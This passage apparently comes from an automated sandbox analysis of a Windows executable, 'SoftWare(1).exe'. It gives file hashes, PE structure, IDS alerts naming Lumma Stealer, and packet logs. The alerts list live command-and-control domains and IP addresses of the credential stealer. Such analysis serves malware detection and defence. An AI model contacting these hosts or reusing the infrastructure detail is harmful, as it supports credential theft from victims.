Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542523" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SoftWare(1).exe.log

Download File

Process:	C:\Users\user\Desktop\SoftWare(1).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Roaming\msvcp110.dll

Download File

Process:	C:\Users\user\Desktop\SoftWare(1).exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	553984
Entropy (8bit):	7.138411655503185
Encrypted:	false
SSDEEP:	12288:3kiwcsWJ4JzA4p/cRfXdlBw9oxW7XzD/+b:3kiwcOA0AXw9oxQDD/+
MD5:	FB2B76C35600E9D1F183024B3A825DB2
SHA1:	4AF1940190E185AC073371ED07394E4462C3B06F
SHA-256:	A186F87F03A39B500B1FEC26F1AE4D45ECA026BAAE2335878104DA6ED75550D9
SHA-512:	089C544708F58CF4FEC66EE31FAEED8C35275AA49D81C020379FDDE8157D9F18E6159F9521C4B32B7F74549C9403A99ED699752B90C6291BAB174B7F1B1B3841
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................S................s...........4.......4......4...........4.....4.....Rich...........................PE..L......g...........!...&............4.....................................................@.........................P5..x....5..<....................................(..............................0(..@...............T............................text.............................. ..`.rdata...m.......n..................@..@.data....=...@...2...&..............@....reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466397401139494
Encrypted:	false
SSDEEP:	6144:zIXfpi67eLPU9skLmb0b4qWSPKaJG8nAgejZMMhA2gX4WABl0uNMdwBCswSb/:kXD94qWlLZMM6YFHq+/
MD5:	2E459293004FF60C8FF563F05F889CA6
SHA1:	5883AD71345B8A078D02CA0A08CEB19D4ABE9AA0
SHA-256:	F1E9A6E4719C5588919842D8F3DE01EF20842A82E21746036340D332E5DE4E8F
SHA-512:	FE7DF14DCF49B2F2BE91277D80B144DD643CB63F20CE7EC2117F1A2E95C7E103A8166AB4D75AFAA8F7F210439769DF84AF92989FA2F91467BE8EF191A249808B
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...S..................................................................................................................................................................................................................................................................................................................................................g........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.889221016357341
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SoftWare(1).exe
File size:	359'936 bytes
MD5:	3adc9c7905f10b8c2c0b0bb7826b67a2
SHA1:	e7861a02d2beac0caa3c00eb11a1b84fb54437db
SHA256:	60035aa91fc8436120e0d471f046a14fd45191f5ad56bef0bb3c7688c8f0d1ad
SHA512:	bd7045b7fcf61dc89beeee0b251554a82bfdbd70c5e535011b5b71f94bd548e17ed68af012a9f94e9a14602e83f00b8eba926af66dd5790a09dc17678e9caf70
SSDEEP:	6144:HKTh0X7iFpDBiW9+q7p8BF47jC3gOT8EY5RyN2vOYU4GtrLu61EGMIZqtIHjMbs:eh0riFHiWpC3gOwt5RrOYvGtrLu6vZC4
TLSH:	A274CF9D726032DFC857D4719EA81CA8FA6178BB931F4127A06716E9EE4C897CF140F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..................................... ....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x45e00a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x670C1A9B [Sun Oct 13 19:08:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0045E000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x507d0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5a000	0x740	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5e000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x50000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
'H{_AE	0x2000	0x4dbf8	0x4dc00	11d08a79282b4df81ab9f84adde3cc6d	False	1.0003328476688103	data	7.999398017019204	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x50000	0x91a0	0x9200	dd29f79cc4d125fcf3c26e46306133df	False	0.3909193065068493	data	4.718375229378975	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x5a000	0x740	0x800	4d8e7726045b572f2985bbde8ceda24c	False	0.3984375	data	3.8714481895570363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5c000	0xc	0x200	31373f9c6aeda5023f8c8409dbb92c77	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x5e000	0x10	0x200	5a44ccc84cdb8ea884f1e29fe88ed2ba	False	0.044921875	Applesoft BASIC program data, first line number 5	0.12227588125913882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5a0a0	0x4b4	data			0.4210963455149502
RT_MANIFEST	0x5a554	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T05:01:01.951403+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.28.222	443	TCP
2024-10-14T05:01:01.951403+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.28.222	443	TCP
2024-10-14T05:01:01.983945+0200	2056570	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)	1	192.168.2.4	58982	1.1.1.1	53	UDP
2024-10-14T05:01:02.495251+0200	2056571	ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)	1	192.168.2.4	49731	188.114.96.3	443	TCP
2024-10-14T05:01:02.976284+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	188.114.96.3	443	TCP
2024-10-14T05:01:02.976284+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	188.114.96.3	443	TCP
2024-10-14T05:01:02.992424+0200	2056568	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)	1	192.168.2.4	51466	1.1.1.1	53	UDP
2024-10-14T05:01:03.030095+0200	2056566	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)	1	192.168.2.4	61779	1.1.1.1	53	UDP
2024-10-14T05:01:03.524458+0200	2056567	ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)	1	192.168.2.4	49732	172.67.152.13	443	TCP
2024-10-14T05:01:03.964120+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	172.67.152.13	443	TCP
2024-10-14T05:01:03.964120+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	172.67.152.13	443	TCP
2024-10-14T05:01:03.965677+0200	2056564	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)	1	192.168.2.4	63820	1.1.1.1	53	UDP
2024-10-14T05:01:04.472053+0200	2056565	ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)	1	192.168.2.4	49733	172.67.205.156	443	TCP
2024-10-14T05:01:04.881092+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	172.67.205.156	443	TCP
2024-10-14T05:01:04.881092+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	172.67.205.156	443	TCP
2024-10-14T05:01:04.964186+0200	2056562	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)	1	192.168.2.4	60410	1.1.1.1	53	UDP
2024-10-14T05:01:05.552086+0200	2056563	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)	1	192.168.2.4	49734	104.21.46.170	443	TCP
2024-10-14T05:01:06.007757+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49734	104.21.46.170	443	TCP
2024-10-14T05:01:06.007757+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	104.21.46.170	443	TCP
2024-10-14T05:01:06.027035+0200	2056560	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)	1	192.168.2.4	51139	1.1.1.1	53	UDP
2024-10-14T05:01:06.541867+0200	2056561	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)	1	192.168.2.4	49735	104.21.30.221	443	TCP
2024-10-14T05:01:06.978810+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49735	104.21.30.221	443	TCP
2024-10-14T05:01:06.978810+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49735	104.21.30.221	443	TCP
2024-10-14T05:01:06.988332+0200	2056558	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)	1	192.168.2.4	55368	1.1.1.1	53	UDP
2024-10-14T05:01:07.481620+0200	2056559	ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)	1	192.168.2.4	49736	172.67.141.136	443	TCP
2024-10-14T05:01:07.883701+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	172.67.141.136	443	TCP
2024-10-14T05:01:07.883701+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	172.67.141.136	443	TCP
2024-10-14T05:01:07.888189+0200	2056556	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)	1	192.168.2.4	49533	1.1.1.1	53	UDP
2024-10-14T05:01:08.433757+0200	2056557	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)	1	192.168.2.4	49737	188.114.96.3	443	TCP
2024-10-14T05:01:08.867229+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	188.114.96.3	443	TCP
2024-10-14T05:01:08.867229+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	188.114.96.3	443	TCP
2024-10-14T05:01:10.165473+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49738	104.102.49.254	443	TCP
2024-10-14T05:01:11.254161+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49739	104.21.53.8	443	TCP
2024-10-14T05:01:11.254161+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	104.21.53.8	443	TCP
2024-10-14T05:01:12.869564+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49740	104.21.53.8	443	TCP
2024-10-14T05:01:12.869564+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49740	104.21.53.8	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 05:01:00.951874018 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:00.951936960 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:00.952174902 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:00.954865932 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:00.954946995 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.438234091 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.438441038 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:01.441217899 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:01.441272974 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.441728115 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.487505913 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:01.531966925 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:01.532001019 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:01.532236099 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.951497078 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.951740026 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.951832056 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:01.960669994 CEST	49730	443	192.168.2.4	104.21.28.222
Oct 14, 2024 05:01:01.960736036 CEST	443	49730	104.21.28.222	192.168.2.4
Oct 14, 2024 05:01:01.999376059 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:01.999440908 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:01.999512911 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:01.999905109 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:01.999917984 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.495148897 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.495250940 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:02.517446041 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:02.517467976 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.518460989 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.519864082 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:02.519898891 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:02.520198107 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.976335049 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.976573944 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.976701021 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:02.976785898 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:02.976834059 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:02.976866007 CEST	49731	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:02.976881027 CEST	443	49731	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:03.043523073 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.043596029 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.043678999 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.044002056 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.044027090 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.524369955 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.524457932 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.526465893 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.526515961 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.526873112 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.528198957 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.528249025 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.528315067 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.964096069 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.964339018 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.964437962 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.964519978 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.964519978 CEST	49732	443	192.168.2.4	172.67.152.13
Oct 14, 2024 05:01:03.964565039 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.964591980 CEST	443	49732	172.67.152.13	192.168.2.4
Oct 14, 2024 05:01:03.978405952 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:03.978496075 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:03.978789091 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:03.978904963 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:03.978934050 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.471965075 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.472053051 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:04.473566055 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:04.473593950 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.474085093 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.475284100 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:04.475322962 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:04.475470066 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.881135941 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.881438971 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.881532907 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:04.884406090 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:04.884458065 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:04.884489059 CEST	49733	443	192.168.2.4	172.67.205.156
Oct 14, 2024 05:01:04.884504080 CEST	443	49733	172.67.205.156	192.168.2.4
Oct 14, 2024 05:01:05.027919054 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:05.028003931 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:05.028110027 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:05.039201975 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:05.039238930 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:05.551989079 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:05.552086115 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:05.553720951 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:05.553740978 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:05.554238081 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:05.555490017 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:05.555536032 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:05.555607080 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:06.007812977 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:06.008069038 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:06.008156061 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:06.013461113 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:06.013461113 CEST	49734	443	192.168.2.4	104.21.46.170
Oct 14, 2024 05:01:06.013511896 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:06.013539076 CEST	443	49734	104.21.46.170	192.168.2.4
Oct 14, 2024 05:01:06.040196896 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.040256023 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.040334940 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.040600061 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.040683031 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.541785955 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.541867018 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.543662071 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.543677092 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.544097900 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.545280933 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.545304060 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.545373917 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.978943110 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.979199886 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:06.979408979 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.979409933 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:06.979409933 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:07.000916958 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.000961065 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.001130104 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.001303911 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.001311064 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.284244061 CEST	49735	443	192.168.2.4	104.21.30.221
Oct 14, 2024 05:01:07.284312010 CEST	443	49735	104.21.30.221	192.168.2.4
Oct 14, 2024 05:01:07.481486082 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.481620073 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.483700037 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.483715057 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.484143019 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.485635042 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.485675097 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.485896111 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.883794069 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.884030104 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.884140015 CEST	49736	443	192.168.2.4	172.67.141.136
